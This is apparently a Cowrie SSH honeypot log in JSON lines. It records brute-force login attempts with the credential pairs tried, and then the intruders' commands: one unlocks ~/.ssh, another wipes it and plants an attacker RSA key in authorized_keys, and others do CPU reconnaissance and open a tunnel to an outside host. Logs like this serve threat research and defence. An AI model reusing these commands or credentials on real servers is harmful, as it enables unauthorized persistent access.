{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:59.404180Z","src_ip":"68.183.87.241","session":"066ed65935f5"}
{"eventid":"cowrie.login.failed","username":"richard","password":"richard123","message":"login attempt [richard/richard123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:34:00.504269Z","src_ip":"68.183.87.241","session":"066ed65935f5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:01.770854Z","src_ip":"68.183.87.241","session":"066ed65935f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55792,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c25fd22a0f0","protocol":"ssh","message":"New connection: 212.227.235.229:55792 (1.2.3.4:22) [session: 9c25fd22a0f0]","sensor":"my-vps","timestamp":"2025-08-26T04:34:17.158398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:17.159415Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:18.385861Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Changeme@123","message":"login attempt [root/Changeme@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:34:19.135645Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:19.654919Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:34:19.655713Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:34:19.657095Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:19.909240Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:20.512236Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:34:20.512959Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:34:20.764669Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:20.765615Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55808,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0b143db1f27","protocol":"ssh","message":"New connection: 212.227.235.229:55808 (1.2.3.4:22) [session: c0b143db1f27]","sensor":"my-vps","timestamp":"2025-08-26T04:34:21.026299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:21.027344Z","src_ip":"212.227.235.229","session":"c0b143db1f27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:22.302330Z","src_ip":"212.227.235.229","session":"c0b143db1f27"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.096465Z","src_ip":"212.227.235.229","session":"c0b143db1f27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48150,"dst_ip":"1.2.3.4","dst_port":22,"session":"1eea404f491e","protocol":"ssh","message":"New connection: 212.227.235.229:48150 (1.2.3.4:22) [session: 1eea404f491e]","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.171381Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.172476Z","src_ip":"212.227.235.229","session":"1eea404f491e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48515,"dst_ip":"1.2.3.4","dst_port":22,"session":"6775f914595d","protocol":"ssh","message":"New connection: 212.227.235.229:48515 (1.2.3.4:22) [session: 6775f914595d]","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.272389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.273141Z","src_ip":"212.227.235.229","session":"6775f914595d"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.403206Z","src_ip":"212.227.235.229","session":"6775f914595d"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.796287Z","src_ip":"212.227.235.229","session":"6775f914595d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T04:34:23.927546Z","session":"6775f914595d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48770,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42692006d4c","protocol":"ssh","message":"New connection: 212.227.235.229:48770 (1.2.3.4:22) [session: c42692006d4c]","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.111171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.112073Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.362152Z","src_ip":"212.227.235.229","session":"c0b143db1f27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.380448Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b23d9bca2302","protocol":"ssh","message":"New connection: 212.227.235.229:55812 (1.2.3.4:22) [session: b23d9bca2302]","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.623125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:24.623909Z","src_ip":"212.227.235.229","session":"b23d9bca2302"}
{"eventid":"cowrie.login.success","username":"root","password":"Paris2025","message":"login attempt [root/Paris2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:34:25.496794Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:26.090558Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:34:26.091282Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:34:26.092631Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:26.362595Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:26.917859Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:34:26.918523Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:34:27.189290Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:27.190140Z","src_ip":"212.227.235.229","session":"c42692006d4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48776,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f32af360e98","protocol":"ssh","message":"New connection: 212.227.235.229:48776 (1.2.3.4:22) [session: 0f32af360e98]","sensor":"my-vps","timestamp":"2025-08-26T04:34:27.457151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:27.458077Z","src_ip":"212.227.235.229","session":"0f32af360e98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:27.726289Z","src_ip":"212.227.235.229","session":"0f32af360e98"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:34:28.841627Z","src_ip":"212.227.235.229","session":"0f32af360e98"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.112781Z","src_ip":"212.227.235.229","session":"0f32af360e98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48780,"dst_ip":"1.2.3.4","dst_port":22,"session":"549ee0d0c171","protocol":"ssh","message":"New connection: 212.227.235.229:48780 (1.2.3.4:22) [session: 549ee0d0c171]","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.381298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.382309Z","src_ip":"212.227.235.229","session":"549ee0d0c171"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:34:30.701563Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.702364Z","src_ip":"212.227.235.229","session":"9c25fd22a0f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:34:30.704696Z","src_ip":"212.227.235.229","session":"549ee0d0c171"}
